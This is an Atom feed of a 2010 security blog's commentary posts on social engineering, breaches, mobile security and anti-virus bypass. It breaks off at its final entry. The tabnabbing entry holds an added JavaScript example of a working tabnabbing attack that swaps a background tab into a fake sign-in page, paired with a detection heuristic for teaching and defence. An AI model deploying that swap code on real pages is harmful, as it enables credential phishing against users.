<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:thr="http://purl.org/syndication/thread/1.0">
    <title>RiskPundit</title>
    
    
    <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/" />
    <id>tag:typepad.com,2003:weblog-78093125387589388</id>
    <updated>2010-06-13T19:07:09-04:00</updated>
    <subtitle>Thoughts and opinion on IT Security issues from a practical Risk Management perspective</subtitle>
    <generator uri="http://www.typepad.com/">TypePad</generator>
    <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Riskpundit" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="riskpundit" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://hubbub.api.typepad.com/" /><entry>
        <title>HoneyBot - Automated IRC Social Engineering</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/honeybot-automated-irc-social-engineering.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/honeybot-automated-irc-social-engineering.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c01348414b8c4970c</id>
        <published>2010-06-13T19:07:09-04:00</published>
        <updated>2010-06-13T19:07:09-04:00</updated>
        <summary>IRC-Junkie is reporting that researchers at TU Wien (Vienna University of Technology, Austria) have developed a software program that performs a "man-in-the-middle" attack between IRC users causing them to click on malicious links at a 76% click rate. As opposed to impersonating a user and attempting to perform one side of the conversation, this program sits between two users and simply makes changes to the words and inserts malicious links. The so called "HoneyBot" is capable of influencing the ongoing conversation by “dropping, inserting, or modifying messages” and the researchers assert that “if links (or questions) are inserted into such...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Social Engineering" />
        
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>IRC-Junkie is <a href="http://www.irc-junkie.org/2010-06-11/researchers-develop-honeybot-social-engineer-irc-users-automatically/" mce_href="http://www.irc-junkie.org/2010-06-11/researchers-develop-honeybot-social-engineer-irc-users-automatically/" target="_blank">reporting </a>that researchers at TU Wien (Vienna 
University of Technology, Austria) have developed a software program 
that performs a "man-in-the-middle" attack between IRC users causing 
them to click on malicious links at a 76% click rate. As opposed to 
impersonating a user and attempting to perform one side of the 
conversation, this program sits between two users and simply makes 
changes to the words and inserts malicious links.</p>
<blockquote><p>The so called "HoneyBot" is capable of influencing the 
ongoing conversation by <em>“dropping, inserting, or modifying messages”</em>
 and the researchers assert that <em>“if links (or questions) are 
inserted into such a conversation, they will seem to originate from a 
human user”</em> and therefore the click-probability will be <em>“higher 
than in artificial conversation approaches”.</em></p></blockquote>
<p>It seems to me that the high click rate is due to the lack of 
knowledge that such an attack is even possible and therefore people are 
not in the least bit suspicious. If HoneyBots become more prevalent, 
people will be more on guard.</p>
<p>In any case, approach each link cautiously: hover over it and 
inspect the URL shown at the bottom of the browser window. If you 
cannot determine exactly where the URL will take you, don't click 
on it. Bear in mind that the hover preview shows the link's current 
target, and page script can still rewrite that target at click time, 
so the preview is a check, not a guarantee.</p>
<p>Another thought, how long before we see this type of attack in the 
wild on Facebook?</p></div>
</content>



    </entry>
    <entry>
        <title>The End of Malware? Hardly.</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/the-end-of-malware-hardly.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/the-end-of-malware-hardly.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c01348365a8ef970c</id>
        <published>2010-06-06T18:10:49-04:00</published>
        <updated>2010-06-06T18:10:49-04:00</updated>
        <summary>Slate recently published an article entitled, "The End of Malware?" The sub-title is, "How Android, Chrome, and the iPad are shielding us from dastardly programs." The premise trotted out the usual, Windows is insecure; Android, Chrome, and the iPad are more secure because they deploy sandboxing technology, i.e. restricting an application's access to operating system resources. While this may be a good thing, it is hardly the "end of malware." Not even close. What the author is missing is the intent and motivation of the bad guys. They go where the money is, i.e. where there is the opportunity to steal...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Malware" />
        
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>Slate recently published an article entitled, "<a href="http://www.slate.com/id/2255917/" mce_href="http://www.slate.com/id/2255917/" target="_blank">The End of 
Malware?</a>" The sub-title is, "How Android, Chrome, and the iPad are 
shielding us from dastardly programs." The premise trotted out the 
usual, Windows is insecure; Android, Chrome, and the iPad are more 
secure because they deploy sandboxing technology, i.e. restricting an 
application's access to operating system resources.</p>
<p>While this may be a good thing, it is hardly the "end of malware." 
Not even close. What the author is missing is the intent and motivation 
of the bad guys. They go where the money is, i.e. where there is the 
opportunity to steal cash from people's bank accounts, steal credit card
 information, and steal intellectual property they can sell. At present, 
these opportunities are minimal on Android, Chrome, and iPads. Once 
there is critical mass for profitable hacking, you will definitely see 
an increase in exploits on these devices.</p>
<p>Now even with limited opportunities for profitable hacking we are 
starting to hear about vulnerabilities on these devices. Just yesterday I
 wrote about a <a href="http://www.cymbel.com/?p=601" mce_href="http://www.cymbel.com/?p=601" target="_blank">Massive iPhone 
Security Issue</a> where passcode protected content on the iPhone can be
 accessed by simply attaching the device to a computer running Ubuntu or
 OSX. Therefore, if you lose your iPhone, your passcode protection is 
useless.</p>
<p>If you need to hear more, check out the June 3 article in the Wall 
St. Journal, <a href="http://online.wsj.com/article/SB10001424052748703340904575284532175834088.html?mod=rss_whats_news_technology&amp;utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+wsj%2Fxml%2Frss%2F3_7015+%28WSJ.com%3A+What%27s+News+Technology%29&amp;utm_content=My+Yahoo" mce_href="http://online.wsj.com/article/SB10001424052748703340904575284532175834088.html?mod=rss_whats_news_technology&amp;utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+wsj%2Fxml%2Frss%2F3_7015+%28WSJ.com%3A+What%27s+News+Technology%29&amp;utm_content=My+Yahoo" target="_blank">Dark Side Arises for Phone Apps</a>. Here are some key 
quotes, first on Google:</p>
<blockquote><p><em>In one incident, Google pulled dozens of unauthorized 
mobile-banking apps from its Android Market in December. The apps, 
priced at $1.50, were made by a developer named "09Droid" and claimed 
to offer access to accounts at many of the world's banks. Google said 
it pulled the apps because they violated its trademark policy. </em></p>
<p><em>The apps were more useless than malicious, but could have been 
updated to capture customers' banking credentials, said John Hering, 
chief executive of Lookout, a mobile security provider. "It is becoming
 easier for the bad guys to use the app stores," Mr. Hering said.</em></p></blockquote>
<p>And on Apple:</p>
<blockquote><p><em>Apple vets applications before they appear in its App 
Store, but risks still exist. In July 2008, Apple pulled a popular game
 called Aurora Feint from its store after it was discovered to be 
uploading users' contact lists to the game maker's servers. More 
recently, it yanked hundreds of apps it said violated its policies, 
some out of security concerns.</em></p></blockquote>
<p>In conclusion, while sandboxing is a good idea, there is no silver 
bullet when it comes to security.</p></div>
</content>



    </entry>
    <entry>
        <title>Massive iPhone Security Issue</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/massive-iphone-security-issue.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/06/massive-iphone-security-issue.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c0133f03bd665970b</id>
        <published>2010-06-06T18:08:56-04:00</published>
        <updated>2010-06-06T18:08:56-04:00</updated>
        <summary>ReadWriteEnterprise is reporting that: Content stored on an iPhone 3GS with passcode protection can be accessed without the passcode simply by attaching the device to a computer running the latest version of Ubuntu or a Windows or OSX system running off the shelf software such as iPhone Explorer. This flaw was discovered by Bernd Marienfeld, an information security professional and blogger, last week. Recently, the enterprise has seen a steep increase in the adoption of the iPhone and iPad. But Apple will need to aggressively address security concerns such as these in order to gain and hold market share. Read...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Malware" />
        
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>ReadWriteEnterprise is reporting that:</p>
<blockquote><p><em>Content stored on an iPhone 3GS with passcode 
protection can be accessed without the passcode simply by attaching the
 device to a computer running the latest version of Ubuntu or a Windows
 or OSX system running off the shelf software such as <a href="http://www.macroplant.com/iphoneexplorer/" mce_href="http://www.macroplant.com/iphoneexplorer/">iPhone Explorer</a>.
 This flaw was <a href="http://marienfeldt.wordpress.com/2010/03/22/iphone-business-security-framework/" mce_href="http://marienfeldt.wordpress.com/2010/03/22/iphone-business-security-framework/" target="_blank">discovered </a>by Bernd Marienfeld, an information 
security professional and blogger, last week. Recently, the enterprise 
has seen a steep increase in the adoption of the <a href="http://www.readwriteweb.com/enterprise/2010/05/4-of-10-iphones-sold-to-enterp.php" mce_href="http://www.readwriteweb.com/enterprise/2010/05/4-of-10-iphones-sold-to-enterp.php" target="_blank">iPhone</a> and <a href="http://www.readwriteweb.com/cloud/2010/05/beyond-browsing-will-80-of-businesses-support-the-ipad.php" mce_href="http://www.readwriteweb.com/cloud/2010/05/beyond-browsing-will-80-of-businesses-support-the-ipad.php" target="_blank">iPad</a>. But <a href="http://apple.com/" mce_href="http://apple.com/" target="_blank">Apple</a> will need to 
aggressively address security concerns such as these in order to gain 
and hold market share</em>.</p></blockquote>
<p>Read the whole article <a href="http://www.readwriteweb.com/enterprise/2010/05/massive-iphone-security-issue-could-endanger-enterprise-adoption.php?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+readwriteenterprise+%28ReadWriteEnterprise%29" mce_href="http://www.readwriteweb.com/enterprise/2010/05/massive-iphone-security-issue-could-endanger-enterprise-adoption.php?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+readwriteenterprise+%28ReadWriteEnterprise%29" target="_blank">here</a>.</p></div>
</content>



    </entry>
    <entry>
        <title>Tabnabbing - a new variation on phishing</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/tabnabbing-a-new-variation-on-phishing.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/tabnabbing-a-new-variation-on-phishing.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c0133ee8679dd970b</id>
        <published>2010-05-25T17:26:33-04:00</published>
        <updated>2010-05-25T17:26:33-04:00</updated>
        <summary>Aza Raskin, the Creative Lead for Firefox (via Ajaxian), describes a new variation on phishing called "tabnabbing," the "process of replacing the entire contents of a page while it's on a background tab." This is another example of malicious JavaScript in action. Does your Secure Web Gateway vendor block this attack?</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Malware" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Phishing" />
        
        <category scheme="http://sixapart.com/ns/types#tag" term="IT Security" />
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml">Aza Raskin, the Creative Lead for Firefox (via <a href="http://ajaxian.com/archives/tabnabbing-phishing-by-switching-background-tab-content" target="_blank">Ajaxian</a>), <a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/" target="_blank">describes </a>a new variation on phishing called "tabnabbing," the "process of replacing the entire contents of a page while it's on a background tab." This is another example of malicious JavaScript in action. Does your Secure Web Gateway vendor block this attack?</div>
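As an added example that is not part of the original post and not Aza Raskin's demo code, here is the technique in miniature together with a simple check for it. The script is written against an injected doc/win pair so it runs under Node with a constructed stand-in for window and document (the URL, page texts and favicon paths are placeholders); in a browser you would pass window.document and window. The names installTabnab, snapshot, looksTabnabbed, makeStubWindow and runScenario are this example's own.

```javascript
// Added example (not code from the original post or from Aza Raskin's write-up):
// a minimal tabnabbing script written against an injected `doc`/`win` pair so
// that it runs under Node with the constructed stub below, and in a browser if
// called as installTabnab(window.document, window, lure).
// Attacker side: stay harmless while the tab has focus; once it has been in the
// background for a while, rewrite title, favicon and body so the tab looks like a
// login page the user believes they left open. The trigger is loss of focus.

function installTabnab(doc, win, lure) {
  const original = { title: doc.title, body: doc.body.textContent };
  let timer = null;
  let swapped = false;

  function swap() {
    doc.title = lure.title;                    // tab label changes
    const icon = doc.querySelector('link[rel="icon"]');
    if (icon) icon.href = lure.favicon;        // favicon changes too
    doc.body.textContent = lure.bodyText;      // the fake sign-in form goes here
    swapped = true;
  }
  function restore() {
    doc.title = original.title;
    doc.body.textContent = original.body;
    swapped = false;
  }

  win.addEventListener('blur', () => {
    timer = win.setTimeout(swap, lure.delayMs);
  });
  // If the user comes straight back, cancel so the swap is never seen happening.
  win.addEventListener('focus', () => {
    if (timer !== null) { win.clearTimeout(timer); timer = null; }
  });
  return { isSwapped: () => swapped, restore };
}

// Defender side (a userscript-style heuristic, also added here): record what
// identifies the page, then compare on focus. A page whose URL has not changed
// but whose title or favicon has is behaving like a tabnab, so warn. It cannot
// replace reading the address bar, since a legitimate page may retitle itself.
function snapshot(doc) {
  const icon = doc.querySelector('link[rel="icon"]');
  return { href: doc.location.href, title: doc.title, favicon: icon ? icon.href : null };
}
function looksTabnabbed(before, after) {
  if (before.href !== after.href) return false;     // a real navigation happened
  return before.title !== after.title || before.favicon !== after.favicon;
}

// Constructed stand-in for window/document so the script can be exercised
// offline; the URL is a placeholder, not a real site.
function makeStubWindow() {
  const listeners = {};
  const timers = [];
  const iconEl = { href: '/article.ico' };
  const doc = {
    location: { href: 'https://news.example/long-read' },
    title: 'Harmless article',
    body: { textContent: 'Some article text' },
    querySelector: (sel) => (sel === 'link[rel="icon"]' ? iconEl : null),
  };
  const win = {
    addEventListener: (name, fn) => { (listeners[name] = listeners[name] || []).push(fn); },
    dispatch: (name) => { (listeners[name] || []).forEach((fn) => fn()); },
    setTimeout: (fn, ms) => { timers.push({ fn, ms }); return timers.length; },
    clearTimeout: (id) => { timers[id - 1] = null; },
    // Advance fake time by `elapsedMs` and fire every timer that is now due.
    tick: (elapsedMs) => {
      timers.forEach((t, i) => {
        if (t === null) return;
        if (elapsedMs >= t.ms) { timers[i] = null; t.fn(); }
      });
    },
  };
  return { doc, win };
}

// One user journey: the tab loses focus, the user stays away for `awayMs`,
// then comes back. Returns whether the page swapped and whether the heuristic caught it.
function runScenario(awayMs) {
  const { doc, win } = makeStubWindow();
  const nab = installTabnab(doc, win, {
    title: 'Sign in - Webmail', favicon: '/mail.ico',
    bodyText: 'Your session expired. Please sign in again.', delayMs: 5000,
  });
  const before = snapshot(doc);
  win.dispatch('blur');
  win.tick(awayMs);
  win.dispatch('focus');
  return { swapped: nab.isSwapped(), warned: looksTabnabbed(before, snapshot(doc)) };
}

console.log(runScenario(1000), runScenario(60000));
```

The delay matters: a swap that happens while the user can still see the tab gives the game away, which is why the trigger is blur plus a timer that focus cancels. On the defensive side the heuristic only notices that the page changed identity without navigating; the real check is still the address bar, which the page cannot rewrite.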
</content>



    </entry>
    <entry>
        <title>Identity theft the old-fashioned way</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/identity-theft-the-oldfashioned-way.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/identity-theft-the-oldfashioned-way.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c01348179278a970c</id>
        <published>2010-05-22T18:16:15-04:00</published>
        <updated>2010-05-22T18:16:15-04:00</updated>
        <summary>We are constantly amazed at the new levels of creativity criminals apply to achieve their goals. However, sometimes the old-fashioned approaches work just as well. From the Office of Inadequate Security comes this report: Silicon Valley Eyecare Optometry and Contact Lenses State: California Approx. # of Individuals Affected: 40,000 Date of Breach: 4/02/10 Type of Breach: Theft Location of Breached Information: Network Server An FAQ on the firm’s web site says, in part: What happened? On Friday morning April 2, 2010 at 5:30 a.m., two burglars broke an outside window to the administrative area of our office at 770 Scott...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Breaches" />
        
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>We are constantly amazed at the new levels of creativity criminals apply to achieve their goals. However, sometimes the old-fashioned approaches work just as well. From the Office of Inadequate Security comes this <a href="http://www.databreaches.net/?p=11688" target="_blank">report</a>:</p><blockquote><p><em><strong>Silicon Valley Eyecare Optometry and Contact Lenses</strong><br />
State:	 California<br />
Approx. # of Individuals Affected:	 40,000<br />
Date of Breach:	 4/02/10<br />
Type of Breach:	 Theft<br />
Location of Breached Information:	 Network Server</em></p><p><em>An FAQ on the firm’s <a href="http://sites.google.com/site/svepublicnotice/FAQs">web site</a> 
says, in part:</em></p></blockquote>

<blockquote><p><em><strong>What happened?</strong><br />
On Friday morning April 2, 2010 at 5:30 a.m., two burglars broke an 
outside window to the administrative area of our office at 770 Scott 
Boulevard in Santa Clara, CA. Our security cameras show the intruders 
coming through the window, confiscating the computer, and pushing the 
computer and a plasma TV back out the window of entrance, all within 50 
seconds. Our cameras recorded the type of vehicle they were driving. The
 alarm system was activated and the police were notified. A full police
 report was filed. </em></p>
<p><em><strong>What data was stored on the stolen computer server?</strong><br />
The server that was stolen contained our patient data base information. 
The patient records contain names, addresses, phone numbers, and in some
 cases social security numbers. E-mail addresses, birthdates, family 
members, medical insurances as well as medical and ocular health 
information were included. No Optomap retinal images were stored on the 
system. No credit card information was stored on the system.</em></p>
<p><em><strong>Was the information secured?</strong><br />
Yes. There were 3 levels of security in place: physical, technical and
 administrative. Physical security consisted of locked doors, an alarm 
system to the police office, and surveillance cameras. For technical 
security, the data was password protected on two levels: a detailed 
password to access the server and a second password to access the 
patient data base. Administrative security was in place allowing no 
public access to the server.</em></p>
<p><em><strong>Is all of my patient data lost?</strong><br />
No. Our patient data base is backed up nightly and an encrypted copy is
 stored off-site. We were able to restore our data and retrieve our 
patient records.</em></p></blockquote><p>Note that the off-site backup copy of the data is encrypted but the on-site version was not. Passwords on a server mean nothing once the whole machine is carried out the window; only encryption at rest would have kept the 40,000 records out of the burglars' hands.</p></div>
</content>



    </entry>
    <entry>
        <title>Heartland settles with MasterCard for $41 million</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/heartland-settles-with-mastercard-for-41-million.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/heartland-settles-with-mastercard-for-41-million.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c01348178cd69970c</id>
        <published>2010-05-22T16:05:43-04:00</published>
        <updated>2010-05-22T16:05:43-04:00</updated>
        <summary>DarkReading is reporting: In a legal settlement over its 2008 security breach, Heartland Payment Systems has agreed to pay up to $41.4 million to MasterCard Worldwide and its card issuers to repay operational costs and fraud losses attributed to the breach. The article does not state whether this is included in the $139 million they said they set aside in a recent SEC filing. Given that the filing was recent, I would think, yes. As i posted earlier this month, $139 million is a far cry from the initial expected costs of $12 million.</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Breaches" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Legal" />
        
        <category scheme="http://sixapart.com/ns/types#tag" term="IT Security" />
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>DarkReading is <a href="http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=224900619&amp;cid=RSSfeed" target="_blank">reporting</a>:</p><blockquote><p><em><span class="smalltext">In a legal settlement over its 2008 security 
breach, Heartland Payment Systems has agreed to pay up to $41.4 million 
to MasterCard Worldwide and its card issuers to repay operational costs 
and fraud losses attributed to the breach. 
</span></em></p></blockquote><p>The article does not state whether this is included in the $139 million they said they set aside in a recent SEC filing. Given that the filing was recent, I would think so. As I <a href="http://www.riskpundit.com/riskpundit/2010/05/heartland-breach-expenses-reach-139-million-so-far.html" target="_blank">posted </a>earlier this month, $139 million is a far cry from the initial expected costs of $12 million.</p></div>
</content>



    </entry>
    <entry>
        <title>LifeLock's CEO's Identity Stolen 13 Times - Whose fault?</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/lifelocks-ceos-identity-stolen-13-times-whos-fault.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/lifelocks-ceos-identity-stolen-13-times-whos-fault.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c0134812082d0970c</id>
        <published>2010-05-22T15:50:33-04:00</published>
        <updated>2010-05-22T15:50:16-04:00</updated>
        <summary>The Phoenix New Times (via Wired) is reporting that LifeLock's CEO Todd Davis's identity was stolen 13 times. That's 12 more than had been previously reported. The question is, whose fault is it? Clearly from a security perspective, it's not a good idea to display your Social Security Number on billboards and TV advertisements. However, from a marketing perspective it was brilliant. The actual dollar amounts lost due to these identity theft incidents were low. If those costs were simply written off as marketing expenses, it was a good deal for Todd Davis. On the other hand, the legal expenses...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Identity Theft" />
        
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>The Phoenix New Times (via <a href="http://www.wired.com/threatlevel/2010/05/lifelock-identity-theft/#more-16209" target="_blank">Wired</a>) is reporting that LifeLock's CEO Todd Davis's identity was stolen 13 times. That's 12 more than had been previously reported. The question is, whose fault is it?</p><p>Clearly from a security perspective, it's not a good idea to display your Social Security Number on billboards and TV advertisements. However, from a marketing perspective it was brilliant. The actual dollar amounts lost due to these identity theft incidents were low. If those costs were simply written off as marketing expenses, it was a good deal for Todd Davis. </p><p>On the other hand, the legal expenses LifeLock has incurred are a different matter. I am not sure if the $12 million in legal judgments could also be simply written off as marketing expenses. I previously wrote about the $11 million and $1 million judgments 
against LifeLock <a href="http://www.riskpundit.com/riskpundit/2010/03/lifelock-pays-12-million-to-settle-charges-of-false-and-deceptive-claims.html" target="_blank">here</a>.</p><p>LifeLock's identity theft protection is really limited to automatically posting "Initial Fraud Alerts" with the three consumer credit agencies, Equifax, Experian, and TransUnion. </p><p>The actual FTC <a href="http://docs.google.com/viewer?url=http://www.wired.com/images_blogs/threatlevel/2010/03/lifelockcomplaint.pdf" target="_blank">complaint</a>, in section 18, details the limitations of an "Initial Alert." In other words, there are many ways you can still suffer an identity theft attack with an Initial Alert turned on with all three consumer reporting agencies. Many of these are due to third parties not exercising the due diligence they should.</p><p>To my knowledge, only <a href="http://www.equifax.com/compare-products/" target="_blank">Equifax </a>provides a service that actually enables you to LOCK your account. However, locking is not the silver bullet either, as there are forms of identity theft that can be perpetrated without accessing your credit report. And since you can only lock Equifax, you are still vulnerable to Experian or TransUnion being abused. Finally, even if Experian and TransUnion added an easy locking process similar to Equifax's, you would have to pay fees to them as well.</p></div>
</content>



    </entry>
    <entry>
        <title>Heartland breach expenses reach $139 million - so far</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/heartland-breach-expenses-reach-139-million-so-far.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/heartland-breach-expenses-reach-139-million-so-far.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c0133ed837c1d970b</id>
        <published>2010-05-12T08:55:34-04:00</published>
        <updated>2010-05-12T08:55:17-04:00</updated>
        <summary>Computerworld is reporting that Heartland Payment Systems' recent quarterly financial filing revealed that the credit card payment processor's expenses related to their 2008 breach of 130 million credit cards have risen to $139.4 million. This is a far cry from the $12 million CEO Bob Carr said was the appropriate amount to set aside in December 2009 when he settled with American Express for $3.6 million. In January 2010, just one month later, Heartland settled for $60 million with Visa. The Computerworld article also reports that a recent Ponemon Institute study shows that the average cost per security breach in...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Breaches" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Legal" />
        
        <category scheme="http://sixapart.com/ns/types#tag" term="IT Security" />
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml"><p>Computerworld is <a href="http://www.computerworld.com/s/article/9176507/Heartland_breach_expenses_pegged_at_140M_so_far" target="_blank">reporting </a>that Heartland Payment Systems' recent quarterly financial filing revealed that the credit card payment processor's expenses related to their 2008 breach of 130 million credit cards have risen to $139.4 million. </p><p>This is a far cry from the $12 million CEO Bob Carr <a href="http://www.riskpundit.com/riskpundit/2009/12/heartland-pays-amex-36-million-for-2008-breach.html" target="_blank">said </a>was the appropriate amount to set aside in December 2009 when he settled with American Express for $3.6 million. In January 2010, just one month later, Heartland <a href="http://www.riskpundit.com/riskpundit/2010/01/heartland-to-pay-visa-up-to-60-million-for-its-130-million-credit-card-data-breach-in-2008.html" target="_blank">settled </a>for $60 million with Visa.</p><p>The Computerworld article also reports that a recent Ponemon Institute study shows that the average cost per security breach in the U.S. rose to $6.75 million. The "per record" cost is averaging $204. </p><p>First, while not to invalidate, or even question, the results of this study, I would like to point out that it was <a href="http://www.pgp.com/insight/newsroom/press_releases/2009_annual_study_global_cost_of_data_breach.html" target="_blank">sponsored</a> by PGP Corporation (being acquired by Symantec). </p><p>Second, I am not a big fan of averages. See the <a href="http://www.flawofaverages.com/" target="_blank">Flaw of Averages</a> by Sam Savage of Stanford. The point is that you cannot use the average when estimating what a breach would cost you: breach costs are heavily skewed, so a single large event sits far above the mean, and Heartland's numbers make the point.</p></div>
</content>



    </entry>
    <entry>
        <title>Simplistic attacks still work some of the time</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/simplistic-attacks-still-work-some-of-the-time.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/simplistic-attacks-still-work-some-of-the-time.html" thr:count="0" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c013480b6afd2970c</id>
        <published>2010-05-12T08:13:19-04:00</published>
        <updated>2010-05-12T08:13:19-04:00</updated>
        <summary>Sunbelt has a detailed blog post of a ridiculously simple and obvious social engineering attack on Facebook users. The good news is that only 0.05% of Facebook users fell for it. The bad news is that the actual number of Facebook users is 191,372. Given the ease of creating these attacks and the rewards to the attackers, they are not going to stop anytime soon.</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Malware" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Social Engineering" />
        
        <category scheme="http://sixapart.com/ns/types#tag" term="IT Security" />
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
<div xmlns="http://www.w3.org/1999/xhtml">Sunbelt has a detailed blog <a href="http://sunbeltblog.blogspot.com/2010/05/javascript-code-this-on-facebook.html" target="_blank">post </a>on a ridiculously simple and obvious social engineering attack on Facebook users. The good news is that only 0.05% of Facebook users fell for it. The bad news is that 0.05% of Facebook's user base is still 191,372 people. Given how easy these attacks are to create and how well they pay off for the attackers, they are not going to stop anytime soon.</div>
</content>



    </entry>
    <entry>
        <title>New attack bypasses all tested anti-virus products</title>
        <link rel="alternate" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/new-attack-bypasses-all-tested-antivirus-products.html" />
        <link rel="replies" type="text/html" href="http://www.riskpundit.com/riskpundit/2010/05/new-attack-bypasses-all-tested-antivirus-products.html" thr:count="1" thr:updated="2010-05-10T15:13:18-04:00" />
        <id>tag:typepad.com,2003:post-6a01157148a11a970c013480a3f474970c</id>
        <published>2010-05-10T08:45:24-04:00</published>
        <updated>2010-05-10T08:45:24-04:00</updated>
        <summary>Researchers at matousec.com, a security research and consulting group, released a paper describing a vulnerability in the way that anti-virus vendors integrate their products with Windows - System Service Descriptor Table (SSDT). They also built code that exploits this vulnerability which enables them to bypass these anti-virus programs. The Register has a good summary. My first reaction is "so what?" Anti-virus programs have become almost irrelevant as the primary attack vector has shifted to browser-based applications. On the other hand, this vulnerability could lead to a resurgence of more direct viruses. Second, how and how quickly will Microsoft and the...</summary>
        <author>
            <name>riskpundit</name>
        </author>
        <category scheme="http://www.sixapart.com/ns/types#category" term="Innovation" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Malware" />
        <category scheme="http://www.sixapart.com/ns/types#category" term="Research" />
        
        <category scheme="http://sixapart.com/ns/types#tag" term="IT Security" />
        
<content type="xhtml" xml:lang="en-US" xml:base="http://www.riskpundit.com/riskpundit/">
